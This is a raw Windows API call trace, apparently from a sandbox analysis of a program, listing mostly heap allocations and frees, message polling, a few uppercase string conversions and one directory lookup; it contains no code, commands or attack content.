[0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0218.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0218.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0218.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0218.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0218.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0218.462] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0218.463] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0218.463] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0218.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0218.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0218.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0218.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0218.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.464] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0218.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0218.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0218.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0218.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0218.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0218.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0218.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0218.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0218.467] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.467] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Pictures", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 0x9e21f8 [0218.467] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.468] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0218.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.468] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.469] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.469] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.469] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.469] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0218.469] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.469] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0218.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0218.470] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0218.470] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0218.470] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0218.470] PeekMessageW (in: 